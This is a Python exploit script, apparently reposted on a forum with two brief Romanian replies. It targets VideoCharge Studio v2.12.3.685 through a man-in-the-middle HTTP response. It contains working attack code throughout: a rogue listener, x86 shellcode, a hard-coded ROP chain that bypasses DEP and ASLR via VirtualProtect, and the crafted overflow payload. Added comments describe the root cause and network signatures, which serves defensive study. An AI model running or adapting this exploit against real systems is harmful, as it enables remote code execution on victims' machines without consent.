#!/usr/bin/python
# Exploit Title: VideoCharge Studio v2.12.3.685 GetHttpResponse() MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
# Version: v2.12.3.685
# Date: 2014-02-19
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.videocharge.com
# Tested on: Win7-GER (DEP enabled)
#
# Howto / Notes:
# Since it's a MITM RCE you need to spoof the DNS Record for www.videocharge.com in order to successfully exploit this vulnerability
#
# Reviewer notes (defensive reading of this script):
#   This is the *server* half of a man-in-the-middle attack. It binds a TCP
#   listener, accepts exactly one connection, prints whatever the client sent,
#   and replies with a hand-built "HTTP/1.1 200 OK" whose body is `payload`.
#   The vulnerable party is the VideoCharge Studio client that contacts
#   www.videocharge.com over plain HTTP (see Howto above). Nothing on this page
#   shows the client-side parsing beyond the function name GetHttpResponse();
#   the overflow site itself is inferred from the payload layout, not visible.
#   Root cause (vendor side): a remote resource fetched without transport
#   authentication (no TLS / certificate validation) and, presumably, copied
#   into a fixed-size buffer without a length check -- confirm against the
#   advisory. DEP/ASLR did not stop it because every gadget below is a
#   hard-coded address in cc.dll or zlib1.dll, which therefore appear to be
#   loaded at fixed addresses (not ASLR-randomised) -- that is the "ASLR
#   bypass" in the title.
#   Detection (network side): a DNS answer for www.videocharge.com that points
#   somewhere unexpected, or a plain-HTTP 200 response to that host name with
#   "Content-Length: 4000" and a body consisting mostly of 0x90 bytes, is a
#   strong indicator of this attack.

from socket import *
from struct import pack
from time import sleep

# Local address and port the rogue HTTP listener binds to.
host = "192.168.0.1"
port = 80

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)

print "\n[+] Listening on %d ..." % port

# Single connection only; the listener is not looped.
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]

# Thanks Giuseppe D'Amore for the amazing shellcode
# http://www.exploit-db.com/exploits/28996/
shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7")

# Padding runs of 0x90 (NOP). Their lengths are what a network signature for
# this payload would key on; the exact offsets are taken from the advisory and
# are not derivable from anything else on this page.
junk0 = "\x90" * 1277
junk1 = "\x90" * 1900
nops="\x90" * 30
jmpesp=pack('<L',0x102340e8) * 5 # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]

# jump to controlled memory
eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN [zlib1.dll]

#
# ROP registers structure:
# EBP - VirtualProtect() call
# ESP - lpAddress
# EBX - dwSize
# EDX - flNewProtect
# ECX - lpflOldProtect
#

# Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF] and MOV to EBP
rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
rop += pack('<L',0xDE2D66F9) # XOR param 1
rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]
rop += pack('<L',0xDEADBEEF) # XOR param 2
rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] # RETN [cc.dll]
rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll] 
rop += pack('<L',0xDEADBEEF) # Filler
rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]

# Craft VirtualProtect() dwSize in EAX and MOV to EBX
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]
rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll]

# Craft VirtualProtect() flNewProtect in EAX and MOV to EDX
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]
rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]

# Put writable offset for VirtualProtect() lpflOldProtect to ECX
rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]
rop += pack('<L',0x61B96180) # writable location [zlib1.dll]

# POP a value from the stack after PUSHAD and POP value to ESI
# as a preparation for the VirtualProtect() call
rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]
rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]

# Achievement unlocked: PUSHAD
rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll]
rop += pack('<L',0x102340c5) # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]

payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode

# The HTTP response is fully static: the Date and Server headers are fixed
# strings that mimic an Apache/PHP host, and the Content-Length is hard-coded
# rather than computed from the body. These literal header values are usable
# as an IDS signature for this specific script.
buffer = "HTTP/1.1 200 OK\r\n"
buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"
buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"
buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 4000\r\n"
buffer += "Connection: close\r\n"
buffer += "Content-Type: text/html\r\n\r\n"
buffer += payload
buffer += "\r\n"

# Up to 1000 bytes of the client's request are read and echoed; nothing in the
# request is inspected, so any client that connects receives the payload.
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending exploit: OK\n"
# Presumably gives the client time to consume the response before the
# connection is torn down.
sleep(3)
cl.close()
s.close()
BkDService — Posted February 22, 2014: A testat cineva ?
MusicAgain — Posted March 9, 2014: Pf...